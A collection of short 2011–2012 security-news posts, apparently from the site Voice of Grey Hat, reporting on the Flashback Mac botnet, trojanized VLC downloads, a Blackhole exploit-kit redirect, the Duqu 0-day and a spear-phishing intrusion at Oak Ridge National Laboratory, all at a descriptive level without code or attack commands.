<a href=">2011 "The Year of The Hack" A Brief Over View & Prediction of 2012"https://www.voiceofgreyhat.com/2011/12/2011-year-of-hack-brief-over-view.html</a>

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Massive Flashback botnet that hit more than 60K Mac PC world wide originated from hacked and malware-rigged WordPress blog sites. Researchers figure out there were between 30,000 and 100,000 WordPress sites infected in late February and early March, 85% of which are in the United States.

Kaspersky Lab researchers say the infected WordPress blog sites were rigged with code that silently redirected visitors to a malicious server. "When the connection was made to the malicious server, that server would determine which OS was running and serve exploits accordingly," says Roel Schouwenberg, senior researcher for Kaspersky. It was a pay-per-install scheme to spread malware, including the Flashback Trojan.

Most researchers say a gradual decline in machines infected by the Trojan is still underway: As of Thursday, there were about 140,000 infected Macs still out there, according to Symantec, and Kaspersky says it sees only about 30,629 Flashback-infected bots in its sinkhole. Still on the horizon, too, is the possibility of a Flashback comeback, with the command-and-control servers sending their bots updates. "We are watching the command-and-control domains used to control this botnet for any updates ... We haven't seen any new updates being delivered," said Liam O Murchu, manager of operations for Symantec Security Response. "Flashback generates new domains every day, which shows us the attackers have probably written malicious code before. They are aware that their botnet could be taken down with a single domain, so they generate a new one every day." To see the full story click here. 

Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten" targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal informations.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers"https://www.voiceofgreyhat.com/2012/04/flashback-botnet-originated-from-hacked.html</a>

VLC is Giving Malware Alert While Downloading

VLC Player by VideoLAN is no doubt one of the best and most popular media player available on Windows, Mac & Linux systems. Being open source software, the source code of VLC player is available to everyone. It’s however being reported that few fraud companies are abusing the source code and distributing the software infected with malware. These fraud companies tweak the source code and inject their own malware in the player and then make it available for download through various sources. User thinks that it’s the legit version of the software, however, receives the infected version which either does not work or spreads malware on their computer system. 

What’s causing more trouble is that these fraud companies have enough money to have Google Adwards accounts so that they can buy advertisements on the Internet and expand their reach. Many such companies have even registered ‘official sounding’ domains which trick users to believe that they’re actually downloading from the official website. Ludovic Fauvet, the developer of VLC player says that his organization, being a non-profit, does not have enough money to sue these companies which are discrediting his work and also abusing the GPL license.

It’s being highly recommended that users looking to download VLC player should download it ONLY from the official website (link below) to be 100% sure that they’ve downloaded the authentic version of the software that just works fine and does not contain any malware.

                                                                                                                                                                     -News Source (Crazy Engineers)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">VLC is Giving Malware Alert While Downloading"https://www.voiceofgreyhat.com/2011/07/vlc-is-giving-malware-alert-while.html</a>

Account of the man who live tweeted Osama's death has been hacked

Security experts warning to Netizens that online scammers may seek to exploit the death of Al-Qaida leader Osama bin Laden to spread malware has come true.

According to security firm Websense, the website of Sohaib Athar (@ReallyVirtual), the man who unknowingly gave live ring-side view of the bin Laden's death on microblogging site Twitter, has been hacked.

Websense has discovered that the website belonging to Athar has been compromised by hackers and leads to the Blackhole exploit kit. This means Web surfers who visited Athar's blog, Reallyvirtual.com, early on Monday may have malware silently installed on their computers.

According Websense, "Anyone going to this page would also load content from the malicious URL ..., and the Blackhole Exploit Kit would then try to use several exploits to automatically install malware on the PC."

The malware that the drive-by-download attempts to install is a fake system tool named 'WindowsRecovery' that claims to have found problems on the victim's computer. To convince the user that something really is wrong with the system, the malware hides all files and folders in the hard drives and on the desktop says Websense in its blogpost.

And, not surprisingly, scammers offer the user a quick solution to this problems with a purchase of the premium version of 'WindowsRecovery', adds the blog post

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Account of the man who live tweeted Osama's death has been hacked"https://www.voiceofgreyhat.com/2011/05/account-of-man-who-live-tweeted-osamas.html</a>

Microsoft Working To Patch New 0-day Windows Kernel Vulnerability Associated With Duqu

 

Microsoft confirmed on Tuesday that it is working to patch a flaw found in the Duqu malware. Security researchers discovered a previously unknown Windows kernel vulnerability inside the infamous Duqu malware. CrySyS, the group who originally discovered the malware, warned on Tuesday that the malware contains a dropper file with a Microsoft 0-day kernel exploit inside. The exploit could allow malicious users to remotely execute code on an infected system. Microsoft confirmed the vulnerability on Tuesday. Microsoft is working on a security advisory for the issue. “We are working to address a vulnerability believed to be connected to the Duqu malware,” said a Microsoft spokesperson. The software giant is expected to issue a full security bulletin shortly.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Working To Patch New 0-day Windows Kernel Vulnerability Associated With Duqu"https://www.voiceofgreyhat.com/2011/11/microsoft-working-to-patch-new-0-day.html</a>

Top Government Lab Hacked

A top United States federal lab was the victim of a "silent" cyberattack earlier this month, news outlets are reporting.

The Oak Ridge National Laboratory in Tennessee was the victim,according to Nextgov.com.  The lab is an energy department laboratory that studies nuclear fusion, supercomputing, and other areas.  Ironically, "one of the core competencies of the lab is cybersecurity research," accordingto a quote on Wired. The attack prompted a shutdown of e-mail and Internet access at the facility.

The attack vector used to break into Oak Ridge's network is known as an advanced persistent threat, or APT. Nextgov describes it thus: "APTs typically infiltrate a target by e-mailing its employees messages purportedly from legitimate associates that ask the employee to submit personal information, such as passwords, and then harvest this information to access the systems they are after. Once inside the network, the perpetrators often try to extract data -- perhaps proprietary designs or classified information."

Wired provides more details of the attack:

According to Zacharia, the intrusion came in the form of a spear-phishing email sent to lab employees on April 7. The e-mail, purportedly sent from the human resources department, discussed employee benefits and included a link to a malicious web page, where malware exploited the IE vulnerability to download additional code to users’ machines.

The attackers cast their net wide in the company, but hooked only two computers in the phishing scheme, Zacharia said. About 530 employees received the e-mail — out of about 5,000 workers — but only 57 people clicked on the malicious link in the correspondence. Out of this, only two machines got infected with the malware.

The lab began to block the malicious emails soon after they began coming in, but it was already too late. On April 11, administrators discovered a server had been breached when data began leaving the network. Workers cleaned up the infected system, but early Friday evening “a number of other servers suddenly [went] active with the malware,” Zacharia said. The malware had apparently laid dormant for a week before it awoke on those systems. That’s when the lab blocked internet access.

Zacharia said the malware “masked itself” on systems and was designed to erase itself if it tried to compromise a system and was unsuccessful.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Top Government Lab Hacked"https://www.voiceofgreyhat.com/2011/04/download.html</a>